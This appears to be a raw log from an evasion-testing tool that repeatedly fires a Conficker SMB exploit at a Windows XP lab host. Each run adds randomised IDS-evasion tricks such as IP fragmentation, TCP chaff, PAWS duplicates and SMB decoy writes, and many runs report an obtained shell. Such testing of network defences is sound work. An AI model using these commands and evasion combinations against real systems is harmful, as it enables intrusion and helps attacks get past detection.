- - Before every 8th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random MSRPC request-like payload
- Info: NetBIOS connection 10.62.90.119:60901 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Command shell connection reset.
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Shell closed
- 0: Success.
- Pid 28126 timed out - killed
- 2015-06-07 23:24:47 INFO
- Timed out (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=14218 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=UylDA10TeNQ --evasion=[netbios_connect,smb_opentree]ipv4_frag,"904" --evasion=[smb_connect,msrpc_req]smb_chaff,"5","write_flag","msrpc" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"75%","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed UylDA10TeNR
- The following evasions are applied from stage netbios_connect to smb_opentree:
- - IPv4 fragments with at most 904 bytes per fragment
- The following evasions are applied from stage smb_connect to msrpc_req:
- - Before every 5th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random MSRPC request-like payload
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - 75% probability to add a random alphaurgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.111:14218 -> 10.35.1.207:445
- Terminated
- ....
- 715 runs averaging 2.25 runs / second ; progress: 318/43200........2015-06-07 23:24:51 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=13004 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=2GjOOsvsIIQ --evasion=[smb_openpipe,end]smb_writeandxpad,"2","random" --evasion=[msrpc_bind,end]tcp_paws,"50%","268435453","random" --verifydelay=1000 --payload=shell
- Info: Using random seed 2GjOOsvsIIT
- The following evasions are applied from stage smb_openpipe to end:
- - 2 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random bytes.
- The following evasions are applied from stage msrpc_bind to end:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has random bytes as payload
- Info: NetBIOS connection 10.62.90.112:13004 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...
- 727 runs averaging 2.25 runs / second ; progress: 323/43200.....Pid 28669 timed out - killed
- 2015-06-07 23:24:57 INFO
- Timed out (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=12771 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=kfbuWD4P89g --evasion=[netbios_connect,msrpc_req]ipv4_frag,"80" --evasion=[smb_opentree,msrpc_req]tcp_paws,"2","3","alpharandomized" --evasion=[msrpc_req,end]tcp_paws,"2","176664122","alphanumrandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed kfbuWD4P89i
- The following evasions are applied from stage netbios_connect to msrpc_req:
- - IPv4 fragments with at most 80 bytes per fragment
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 3> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage msrpc_req to end:
- - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 176664122> and has original payload with alphanumeric bytes randomized
- Info: NetBIOS connection 10.62.90.115:12771 -> 10.35.1.207:445
- Terminated
- ..
- 735 runs averaging 2.24 runs / second ; progress: 328/43200.......
- 742 runs averaging 2.23 runs / second ; progress: 333/43200....Pid 29029 timed out - killed
- 2015-06-07 23:25:05 INFO
- Timed out (10.62.90.114):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=28770 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=XiG22AlNIMY --evasion=[smb_connect,msrpc_bind]tcp_tsoptreply,"le" --evasion=[smb_opentree,msrpc_req]tcp_urgent,"75%","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed XiG22AlNIMZ
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - TCP timestamps echo reply value is sent in the wrong endianness
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - 75% probability to add a random alphanumeric urgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.114:28770 -> 10.35.1.207:445
- Terminated
- .........
- 756 runs averaging 2.24 runs / second ; progress: 338/43200..............
- 770 runs averaging 2.24 runs / second ; progress: 343/43200..............
- 784 runs averaging 2.25 runs / second ; progress: 348/43200............
- 796 runs averaging 2.25 runs / second ; progress: 353/43200........
- 804 runs averaging 2.24 runs / second ; progress: 358/43200......
- 810 runs averaging 2.23 runs / second ; progress: 363/432002015-06-07 23:25:34 INFO
- Success. (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=47572 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=0nVUQix4y/E --evasion=[smb_opentree,end]tcp_chaff,"2","nullchksum|nullflag|shorthdr","unmodified" --evasion=[netbios_connect,end]tcp_paws,"50%","8","alpharandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed 0nVUQix4y/H
- The following evasions are applied from stage netbios_connect to end:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage smb_opentree to end:
- Info: NetBIOS connection 10.62.90.118:47572 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ..
- 813 runs averaging 2.21 runs / second ; progress: 368/43200......
- 819 runs averaging 2.19 runs / second ; progress: 373/43200Pid 30108 timed out - killed
- 2015-06-07 23:25:43 INFO
- Timed out (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=63115 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=C7Gx0UPKlVk --evasion=[smb_opentree,msrpc_req]tcp_chaff,"8","nullchksum|nullflag|outofwindow","random_alpha" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"75%","random" --verifydelay=1000 --payload=shell
- Info: Using random seed C7Gx0UPKlVk
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - With every 8 TCP packet a TCP chaff packet is sent. The chaff packet has:
- * NULL TCP checksum.
- * NULL TCP control flags.
- * An out-of-window sequence number.
- * Duplicate packet has random alpha bytes as payload
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - 75% probability to add a random urgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.116:63115 -> 10.35.1.207:445
- Terminated
- ..Pid 30138 timed out - killed
- 2015-06-07 23:25:45 INFO
- Timed out (10.62.90.110):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=15702 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=M+TbVWpf7Lc --evasion=[msrpc_bind,end]tcp_paws,"50%","4","zero" --evasion=[smb_openpipe,end]tcp_urgent,"75%","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed M+TbVWpf7Lc
- The following evasions are applied from stage smb_openpipe to end:
- - 75% probability to add a random alphanumeric urgent data byte to a TCP segment.
- The following evasions are applied from stage msrpc_bind to end:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has 0x00 bytes as payload
- Info: NetBIOS connection 10.62.90.110:15702 -> 10.35.1.207:445
- Terminated
- ...........
- 834 runs averaging 2.20 runs / second ; progress: 379/43200...........
- 845 runs averaging 2.20 runs / second ; progress: 384/43200......
- 851 runs averaging 2.19 runs / second ; progress: 389/43200.
- 852 runs averaging 2.16 runs / second ; progress: 394/43200.......
- 859 runs averaging 2.16 runs / second ; progress: 399/43200..............
- 873 runs averaging 2.16 runs / second ; progress: 404/43200......
- 879 runs averaging 2.15 runs / second ; progress: 409/43200
- 879 runs averaging 2.12 runs / second ; progress: 414/43200.....
- 884 runs averaging 2.11 runs / second ; progress: 419/43200.............
- 897 runs averaging 2.12 runs / second ; progress: 424/43200.....2015-06-07 23:26:37 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=56392 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=jxeAP58CYIU --evasion=[start,end]ipv4_opt,"2","inc","zero" --evasion=[netbios_connect,end]tcp_paws,"2","268435455","random_alpha" --evasion=[msrpc_bind,end]tcp_seg,"5" --verifydelay=1000 --payload=shell
- Info: Using random seed jxeAP58CYIW
- - Every 2th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has NULL bytes for payload
- The following evasions are applied from stage netbios_connect to end:
- - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has random alpha bytes as payload
- The following evasions are applied from stage msrpc_bind to end:
- - TCP packets are segmented to contain at most 5 bytes of payload.
- Info: NetBIOS connection 10.62.90.112:56392 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ..
- 905 runs averaging 2.11 runs / second ; progress: 429/43200.......2015-06-07 23:26:43 INFO
- Success. (10.62.90.110):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=31587 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=5heyJRsjnD8 --evasion=[start,smb_openpipe]tcp_chaff,"3","nullchksum|nullflag|outofwindow|longhdr","random_alphanum" --evasion=[smb_opentree,smb_openpipe]tcp_paws,"75%","268435455","alphanumrandomized" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"2","268435454","alpharandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed 5heyJRsjnD/
- The following evasions are applied from stage start to smb_openpipe:
- - With every 3 TCP packet a TCP chaff packet is sent. The chaff packet has:
- * NULL TCP checksum.
- * NULL TCP control flags.
- * An out-of-window sequence number.
- * TCP header longer than packet total size
- * Duplicate packet has random alphanumeric bytes as payload
- The following evasions are applied from stage smb_opentree to smb_openpipe:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has original payload with alphabetic bytes randomized
- Info: NetBIOS connection 10.62.90.110:31587 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Command shell connection reset.
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Shell closed
- 0: Success.
- .
- 914 runs averaging 2.11 runs / second ; progress: 434/43200....2015-06-07 23:26:46 INFO
- Success. (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=22932 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=ZNjKCYBz1U8 --evasion=[smb_connect,smb_opentree]ipv4_opt,"3","inc","alpharandomized" --evasion=[smb_openpipe,msrpc_req]smb_decoytrees,"7","6","7","random_msrpcbind" --verifydelay=1000 --payload=shell
- Info: Using random seed ZNjKCYBz1U9
- The following evasions are applied from stage smb_connect to smb_opentree:
- - Every 3th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has identical payload except that alphabetic characters are randomized
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - Before normal SMB writes, 7 SMB trees are opened and 6 writes are performed to them. The write payload is 7 bytes of MSRPC bind-like data.
- Info: NetBIOS connection 10.62.90.118:22932 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ....
- 923 runs averaging 2.10 runs / second ; progress: 439/43200...
- 926 runs averaging 2.09 runs / second ; progress: 444/43200.....
- 931 runs averaging 2.07 runs / second ; progress: 449/43200.....
- 936 runs averaging 2.06 runs / second ; progress: 454/43200.......
- 943 runs averaging 2.06 runs / second ; progress: 459/43200...........
- 954 runs averaging 2.06 runs / second ; progress: 464/432002015-06-07 23:27:14 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=45379 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=PKDFLu3szoA --evasion=[smb_connect,smb_openpipe]smb_decoytrees,"5","1","7","random" --evasion=[msrpc_bind,end]tcp_paws,"75%","236472573","alphanumrandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed PKDFLu3szoA
- The following evasions are applied from stage smb_connect to smb_openpipe:
- - Before normal SMB writes, 5 SMB trees are opened and 1 writes are performed to them. The write payload is 7 random bytes.
- The following evasions are applied from stage msrpc_bind to end:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 236472573> and has original payload with alphanumeric bytes randomized
- Info: NetBIOS connection 10.62.90.116:45379 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- .......
- 962 runs averaging 2.05 runs / second ; progress: 469/43200........
- 970 runs averaging 2.05 runs / second ; progress: 474/43200..
- 972 runs averaging 2.03 runs / second ; progress: 479/43200......2015-06-07 23:27:31 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=18684 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=FSkveGjBNE0 --evasion=[smb_connect,smb_opentree]netbios_chaff,"75%","empty_unspec|empty_keepalive|small_unspec|http_post|msrpc_req|broken_length" --evasion=[msrpc_bind,msrpc_req]smb_decoytrees,"5","4","8","random_msrpcbind" --verifydelay=1000 --payload=shell
- Info: Using random seed FSkveGjBNE0
- The following evasions are applied from stage smb_connect to smb_opentree:
- - 75% probability to send a chaff NetBIOS message before an actual NetBIOS message. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - Before normal SMB writes, 5 SMB trees are opened and 4 writes are performed to them. The write payload is 8 bytes of MSRPC bind-like data.
- Info: NetBIOS connection 10.62.90.112:18684 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ....
- 983 runs averaging 2.03 runs / second ; progress: 484/43200.................
- 1000 runs averaging 2.05 runs / second ; progress: 489/43200........
- 1008 runs averaging 2.04 runs / second ; progress: 494/43200...........
- 1019 runs averaging 2.04 runs / second ; progress: 499/43200.........
- 1028 runs averaging 2.04 runs / second ; progress: 504/43200Pid 32180 timed out - killed
- 2015-06-07 23:27:54 INFO
- Timed out (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=30975 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=LxaXqpswT/A --evasion=[start,end]tcp_inittsopt,"disable","zero" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"25%","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed LxaXqpswT/A
- - TCP timestamps are disabled.
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - 25% probability to add a random alphaurgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.117:30975 -> 10.35.1.207:445
- Terminated
- ..........2015-06-07 23:27:57 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=63794 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=FUtkY7DTvvk --evasion=[smb_connect,msrpc_req]ipv4_opt,"75%","inc","zero" --evasion=[netbios_connect,msrpc_req]tcp_paws,"1","248964565","shuffle" --verifydelay=1000 --payload=shell
- Info: Using random seed FUtkY7DTvvk
- The following evasions are applied from stage netbios_connect to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 248964565> and has shuffled original payload
- The following evasions are applied from stage smb_connect to msrpc_req:
- - 75% probability to send a duplicate IPv4 packet with an incrementing DWORD in the options field.
- The duplicate packet has NULL bytes for payload
- Info: NetBIOS connection 10.62.90.117:63794 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- .....
- 1045 runs averaging 2.05 runs / second ; progress: 509/43200.........2015-06-07 23:28:03 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=11579 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=T9gQkNxSf1A --evasion=[smb_openpipe,msrpc_req]tcp_paws,"50%","210110311","alphanumrandomized" --evasion=[netbios_connect,smb_connect]tcp_seg,"8" --verifydelay=1000 --payload=shell
- Info: Using random seed T9gQkNxSf1B
- The following evasions are applied from stage netbios_connect to smb_connect:
- - TCP packets are segmented to contain at most 8 bytes of payload.
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 210110311> and has original payload with alphanumeric bytes randomized
- Info: NetBIOS connection 10.62.90.117:11579 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- .
- 1056 runs averaging 2.05 runs / second ; progress: 514/43200.....
- 1061 runs averaging 2.04 runs / second ; progress: 519/43200...2015-06-07 23:28:13 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=14967 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=pKBgcpQw7jU --evasion=[start,msrpc_req]tcp_paws,"3","4","random_alpha" --evasion=[netbios_connect,end]tcp_timewait,"9","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed pKBgcpQw7jW
- The following evasions are applied from stage start to msrpc_req:
- - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has random alpha bytes as payload
- The following evasions are applied from stage netbios_connect to end:
- - 9 decoy TCP connections are opened from the same TCP port as the exploit connection will use. Each connection will be 32-544 bytes long and has random alphanumeric bytes as payload
- Info: NetBIOS connection 10.62.90.117:14967 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- 1065 runs averaging 2.03 runs / second ; progress: 524/43200...........
- 1076 runs averaging 2.03 runs / second ; progress: 529/43200...........
- 1087 runs averaging 2.04 runs / second ; progress: 534/43200.....
- 1092 runs averaging 2.03 runs / second ; progress: 539/43200...Pid 374 timed out - killed
- 2015-06-07 23:28:32 INFO
- Timed out (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=57743 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=nx9xO19TZJk --evasion=[smb_connect,smb_opentree]ipv4_opt,"5","inc","random_alphanum" --evasion=[smb_connect,end]tcp_urgent,"25%","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed nx9xO19TZJm
- The following evasions are applied from stage smb_connect to smb_opentree:
- - Every 5th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has random alphanumeric bytes as payload
- The following evasions are applied from stage smb_connect to end:
- - 25% probability to add a zero urgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.113:57743 -> 10.35.1.207:445
- Terminated
- .....
- 1101 runs averaging 2.02 runs / second ; progress: 544/43200...........2015-06-07 23:28:38 INFO
- Success. (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=29873 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=1DXgDuqehjs --evasion=[smb_opentree,smb_openpipe]smb_writeandxpad,"1023","random_alphanum" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"1","6","alphanumrandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed 1DXgDuqehjv
- The following evasions are applied from stage smb_opentree to smb_openpipe:
- - 1023 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random alphanumeric bytes.
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has original payload with alphanumeric bytes randomized
- Info: NetBIOS connection 10.62.90.113:29873 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...
- 1116 runs averaging 2.03 runs / second ; progress: 549/43200...........
- 1127 runs averaging 2.03 runs / second ; progress: 554/43200...
- 1130 runs averaging 2.02 runs / second ; progress: 559/43200........
- 1138 runs averaging 2.02 runs / second ; progress: 564/43200......
- 1144 runs averaging 2.01 runs / second ; progress: 569/43200......
- 1150 runs averaging 2.00 runs / second ; progress: 574/43200....
- 1154 runs averaging 1.99 runs / second ; progress: 579/43200..........
- 1164 runs averaging 1.99 runs / second ; progress: 584/43200.....
- 1169 runs averaging 1.98 runs / second ; progress: 589/43200
- 1169 runs averaging 1.97 runs / second ; progress: 594/43200
- 1169 runs averaging 1.95 runs / second ; progress: 599/43200.....
- 1174 runs averaging 1.94 runs / second ; progress: 604/43200..2015-06-07 23:29:35 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=49313 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=4tABlTwo17Y --evasion=[smb_openpipe,msrpc_bind]smb_writeandxpad,"9","random" --evasion=[smb_openpipe,msrpc_bind]tcp_overlap,"5","new","zero" --evasion=[start,end]tcp_paws,"1","6","alpharandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed 4tABlTwo17b
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - TCP segments are set to overlap by 5 bytes, with the later packet containing the correct payload. Overlapping part has 0x00 bytes as payload
- - 9 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random bytes.
- Info: NetBIOS connection 10.62.90.112:49313 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .........
- 1186 runs averaging 1.95 runs / second ; progress: 609/43200......
- 1192 runs averaging 1.94 runs / second ; progress: 614/43200.......
- 1199 runs averaging 1.94 runs / second ; progress: 619/43200..Pid 1385 timed out - killed
- 2015-06-07 23:29:50 INFO
- Timed out (10.62.90.119):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=39203 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=d/6+woTIRZQ --evasion=[smb_opentree,msrpc_bind]tcp_overlap,"4","new","random_alphanum" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"1","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed d/6+woTIRZR
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - TCP segments are set to overlap by 4 bytes, with the later packet containing the correct payload. Overlapping part has random alphanumeric bytes as payload
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - Add a zero urgent data byte to every 1 TCP segment.
- Info: NetBIOS connection 10.62.90.119:39203 -> 10.35.1.207:445
- Terminated
- ..2015-06-07 23:29:52 INFO
- Success. (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=26962 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=JpRj3RSvUgQ --evasion=[smb_opentree,msrpc_req]smb_decoytrees,"5","7","2","random_msrpcbind" --evasion=[start,netbios_connect]tcp_paws,"5","208562135","alpharandomized" --evasion=[start,msrpc_bind]tcp_paws,"8","203623296","shuffle" --verifydelay=1000 --payload=shell
- Info: Using random seed JpRj3RSvUgQ
- The following evasions are applied from stage start to netbios_connect:
- - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 208562135> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage start to msrpc_bind:
- - Every 8th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 203623296> and has shuffled original payload
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Before normal SMB writes, 5 SMB trees are opened and 7 writes are performed to them. The write payload is 2 bytes of MSRPC bind-like data.
- Info: NetBIOS connection 10.62.90.113:26962 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ....
- 1209 runs averaging 1.94 runs / second ; progress: 624/43200.......
- 1216 runs averaging 1.93 runs / second ; progress: 629/43200.........
- 1225 runs averaging 1.93 runs / second ; progress: 634/43200.
- 1226 runs averaging 1.92 runs / second ; progress: 639/43200..Pid 1869 timed out - killed
- 2015-06-07 23:30:10 INFO
- Timed out (10.62.90.115):
